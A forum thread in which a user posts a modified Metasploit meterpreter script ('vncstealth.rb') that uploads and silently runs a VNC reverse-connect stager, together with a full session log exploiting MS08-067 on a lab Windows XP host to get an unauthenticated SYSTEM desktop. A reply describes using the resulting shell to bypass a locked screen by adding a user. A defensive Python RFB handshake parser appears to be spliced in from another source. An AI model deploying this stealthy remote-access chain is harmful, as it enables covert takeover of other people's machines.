Thread: msf vnc courtesy shell

  1. #1
    prowl3r (Guest)

    msf vnc courtesy shell

    I've been testing the new vnc meterpreter script hdm just wrote, as per:

    Twitter / HD Moore: RunVNC: quickly spawn a V ...

    It works just fine. However, it pops a courtesy shell, so I added:

    Code:
    set DisableCourtesyShell TRUE

    just before executing the exploit. The parameter was properly echoed. But the courtesy shell keeps showing.

    Has anyone else tried this?

    Edit: Possibly this is because it's a Meterpreter script, not a payload. Just wondering if there's a command available to disable it.

    Edit 2:

    OK, guys, flooded by replies...

    Never mind, I modified the original script vnc.rb as follows:

    Code:
    # $Id: vnc.rb 7872 2009-12-15 05:10:33Z hdm $
    
    #
    # Meterpreter script for obtaining a quick VNC session
    #
    
    session = client
    
    #
    # Options
    #
    opts = Rex::Parser::Arguments.new(
    	"-h"  => [ false,  "This help menu"],
    	"-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
    	"-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4545)"],
    	"-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"]
    )
    
    #
    # Default parameters
    #
    
    rhost    = Rex::Socket.source_address("1.2.3.4")
    rport    = 4545
    autoconn = true
    
    #
    # Option parsing
    #
    opts.parse(args) do |opt, idx, val|
    	case opt
    	when "-h"
    		print_line(opts.usage)
    		return
    	when "-r"
    		rhost = val
    	when "-p"
    		rport = val.to_i
    	when "-D"
    		autoconn = false
    	end
    end
    
    #
    # Create the agent EXE
    #
    print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport}")
    pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
    pay.datastore['LHOST'] = rhost
    pay.datastore['LPORT'] = rport
    raw  = pay.generate
    
    exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
    print_status("VNC stager executable #{exe.length} bytes long")
    
    
    #
    # Upload to the filesystem
    #
    
    tempdir = client.fs.file.expand_path("%TEMP%")
    tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
    tempexe.gsub!("\\\\", "\\")
    
    fd = client.fs.file.new(tempexe, "wb")
    fd.write(exe)
    fd.close
    
    print_status("Uploaded the VNC agent to #{tempexe} (must be deleted manually)")
    
    #
    # Setup the multi/handler if requested
    #
    
    if(autoconn)
    	mul = client.framework.exploits.create("multi/handler")
    	mul.datastore['PAYLOAD']   = "windows/vncinject/reverse_tcp"
    	mul.datastore['LHOST']     = rhost
    	mul.datastore['LPORT']     = rport
    	mul.datastore['EXITFUNC']  = 'process'
    	mul.datastore['ExitOnSession'] = true
    	# Added: the courtesy shell is a handler-side option, so it has to be set
    	# on the multi/handler this script creates, not on the original exploit.
    	mul.datastore['DisableCourtesyShell'] = true
    
    	mul.exploit_simple(
    		'Payload'        => mul.datastore['PAYLOAD'],
    		'RunAsJob'       => true
    	)
    end
    
    #
    # Execute the agent
    #
    print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
    proc = session.sys.process.execute(tempexe, nil, {'Hidden' => true})

    Then, saved as:

    Code:
    /pentest/exploits/framework3/scripts/meterpreter/vncstealth.rb

    And tested it:

    Code:
                                      _       _
                 _                   | |     (_)_
     ____   ____| |_  ____  ___ ____ | | ___  _| |_
    |    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
    | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
    |_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                               |_|
    
    
           =[ metasploit v3.3.3-dev [core:3.3 api:1.0]
    + -- --=[ 476 exploits - 220 auxiliary
    + -- --=[ 262 payloads - 22 encoders - 8 nops
           =[ svn r7893 updated today (2009.12.16)
    
    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
    RHOST => 192.168.1.2
    msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(ms08_067_netapi) > set LHOST 192.168.1.6
    LHOST => 192.168.1.6
    msf exploit(ms08_067_netapi) > set LPORT 4444
    LPORT => 4444
    msf exploit(ms08_067_netapi) > exploit
    [*] Started reverse handler on port 4444
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Sending stage (723456 bytes)
    [*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.2:1035)
    
    meterpreter > run vncstealth
    [*] Creating a VNC stager: LHOST=192.168.1.6 LPORT=4545)
    [*] VNC stager executable 87552 bytes long
    [*] Uploaded the VNC agent to C:\WINDOWS\TEMP\udoGvQNkBM.exe (must be deleted manually)
    [*] Executing the VNC agent with endpoint 192.168.1.6:4545...
    [*] VNC Server session 2 opened (192.168.1.6:4545 -> 192.168.1.2:1036)
    meterpreter > Connected to RFB server, using protocol version 3.3
    No authentication needed
    Desktop name "VNCShell [SYSTEM@LAB-VICTIM] - Full Access"
    VNC server default format:
      32 bits per pixel.
      Least significant byte first in each pixel.
      True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
    Using default colormap which is TrueColor.  Pixel format:
      32 bits per pixel.
      Least significant byte first in each pixel.
      True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
    Using shared memory PutImage
    Same machine: preferring raw encoding

    It's bloody silent now. No pop-up courtesy shell.
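    The session output above shows the RFB 3.3 handshake of the injected server: "protocol version 3.3" followed by "No authentication needed". The following Python parser is an added example, not code from the thread or from Metasploit; it reads a captured server handshake (ProtocolVersion plus the security announcement, for both the 3.3 single-type form and the 3.7+ list form) so an audit of VNC listeners can flag the ones that offer unauthenticated access. The sample byte strings are constructed, not taken from the session.

```python
import re
import struct

# Security-type codes from the RFB specification. RFB 3.3 sends one u32;
# RFB 3.7 and later send a u8 count followed by that many u8 codes.
SECURITY_TYPES = {1: "None", 2: "VNCAuth", 16: "Tight", 18: "TLS", 19: "VeNCrypt"}
VERSION_RE = re.compile(rb"^RFB (\d{3})\.(\d{3})\n")


def _refusal_reason(buf):
    # A refusal carries a u32 reason length followed by the reason text.
    if len(buf) < 4:
        return "(no reason given)"
    (rlen,) = struct.unpack("!I", buf[:4])
    return buf[4:4 + rlen].decode("latin-1", "replace")


def parse_rfb_handshake(data):
    """Parse the server ProtocolVersion and its security announcement.

    Returns the version, the offered security types by name and whether an
    unauthenticated ("None") connection is on offer, as in the session above.
    """
    m = VERSION_RE.match(data)
    if not m:
        raise ValueError("not an RFB ProtocolVersion message")
    version = (int(m.group(1)), int(m.group(2)))
    rest = data[m.end():]
    if version <= (3, 3):
        if len(rest) < 4:
            raise ValueError("truncated security type")
        (code,) = struct.unpack("!I", rest[:4])
        if code == 0:
            raise ValueError("server refused: " + _refusal_reason(rest[4:]))
        types = [code]
    else:
        count = rest[0] if rest else None
        if count is None or len(rest) < 1 + count:
            raise ValueError("truncated security-type list")
        if count == 0:
            raise ValueError("server refused: " + _refusal_reason(rest[1:]))
        types = list(rest[1:1 + count])
    return {
        "version": version,
        "security_types": [SECURITY_TYPES.get(t, f"unknown({t})") for t in types],
        "allows_unauthenticated": 1 in types,
    }


# Constructed sample handshakes (hypothetical, not captured from the thread).
RFB33_NO_AUTH = b"RFB 003.003\n" + struct.pack("!I", 1)
RFB38_WITH_AUTH = b"RFB 003.008\n" + bytes([2, 2, 19])
```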

  2. #2
    Just burned his ISO (Join Date: Jan 2010, Posts: 19)

    WELL HDM IS SUPER wise, and that's the reason why he purposely included the VNC courtesy shell. Well, even I didn't know the reason until one of my friends explained it.

    Well, under normal conditions, when a system is left unused it gets screen-saver password protected, so when we get a courtesy shell you could unlock the machine by creating a new user, as you have a shell.
